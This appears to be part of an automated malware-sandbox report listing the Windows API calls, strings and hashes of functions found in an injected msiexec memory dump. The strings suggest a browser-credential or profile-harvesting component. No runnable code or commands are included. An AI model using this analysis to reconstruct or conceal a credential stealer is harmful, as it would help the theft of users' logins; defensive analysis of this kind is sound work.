                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                              • String ID: .save$http://$https://$log profile$signIn
                                                              • API String ID: 1214746602-2708368587
                                                              • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                              • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                              • memset.MSVCRT ref: 00405E33
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                              • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                              • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                              • String ID:
                                                              • API String ID: 2313361498-0
                                                              • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                              • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageRectSend$Client
                                                              • String ID:
                                                              • API String ID: 2047574939-0
                                                              • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                              • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                              APIs
                                                              • GetSystemTime.KERNEL32(?), ref: 00418836
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                              • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                              • GetTickCount.KERNEL32 ref: 0041887D
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                              • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                              • String ID:
                                                              • API String ID: 4218492932-0
                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                              APIs
                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: gj
                                                              • API String ID: 438689982-4203073231
                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                              APIs
                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                              • API String ID: 3510742995-2446657581
                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                              • memset.MSVCRT ref: 00405ABB
                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                              • SetFocus.USER32(?), ref: 00405B76
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$FocusItemmemset
                                                              • String ID:
                                                              • API String ID: 4281309102-0
                                                              • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                              • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscat
                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                              • API String ID: 384018552-4153097237
                                                              • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                              • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 2029023288-3849865405
                                                              • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                              • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                              APIs
                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                              • memset.MSVCRT ref: 00405455
                                                              • memset.MSVCRT ref: 0040546C
                                                              • memset.MSVCRT ref: 00405483
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy$ErrorLast
                                                              • String ID: 6$\
                                                              • API String ID: 404372293-1284684873
                                                              • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                              • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AttributesErrorFileLastSleep$free
                                                              • String ID:
                                                              • API String ID: 1470729244-0
                                                              • Opcode ID: 09b49c58799734cfd5cd4ac30739c3777d201f49183e4126d4f53e2d18a03a45
                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                              • Opcode Fuzzy Hash: 09b49c58799734cfd5cd4ac30739c3777d201f49183e4126d4f53e2d18a03a45
                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                              • wcscpy.MSVCRT ref: 0040A107
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                              • String ID:
                                                              • API String ID: 1331804452-0
                                                              • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                              • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                              APIs
                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: advapi32.dll
                                                              • API String ID: 2012295524-4050573280
                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                              APIs
                                                              Strings
                                                              • <%s>, xrefs: 004100A6
                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                              • API String ID: 3473751417-2880344631
                                                              • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                              • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset
                                                              • String ID: %2.2X
                                                              • API String ID: 2521778956-791839006
                                                              • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                              • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscpy
                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                              • API String ID: 999028693-502967061
                                                              • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                              • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                              APIs
                                                              • strlen.MSVCRT ref: 00408DFA
                                                                • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                              • memset.MSVCRT ref: 00408E46
                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                              • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memsetstrlen
                                                              • String ID:
                                                              • API String ID: 2350177629-0
                                                              • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                              • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                              • API String ID: 2221118986-1606337402
                                                              • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                              • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                              APIs
                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                              • memset.MSVCRT ref: 00408FD4
                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                              • memset.MSVCRT ref: 00409042
                                                              • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                              • String ID:
                                                              • API String ID: 265355444-0
                                                              • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                              • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                              APIs
                                                              • memset.MSVCRT ref: 004116FF
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 2618321458-3614832568
                                                              • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                              • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AttributesFilefreememset
                                                              • String ID:
                                                              • API String ID: 2507021081-0
                                                              • Opcode ID: 0cc151c1d5ae165ecab844de5cbdb339508ac62c1c3e4137b57658c1e94547ca
                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                              • Opcode Fuzzy Hash: 0cc151c1d5ae165ecab844de5cbdb339508ac62c1c3e4137b57658c1e94547ca
                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                              • malloc.MSVCRT ref: 00417524
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                              • free.MSVCRT ref: 00417544
                                                              • free.MSVCRT ref: 00417562
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                              • String ID:
                                                              • API String ID: 4131324427-0
                                                              • Opcode ID: 0b5abdb1f50a43c92236d4af65df84c42422b68fc3826eb4b9ca135c63c32c08
                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                              • Opcode Fuzzy Hash: 0b5abdb1f50a43c92236d4af65df84c42422b68fc3826eb4b9ca135c63c32c08
                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                              APIs
                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                              • free.MSVCRT ref: 0041822B
                                                              Strings
                                                              Memory Dump Source
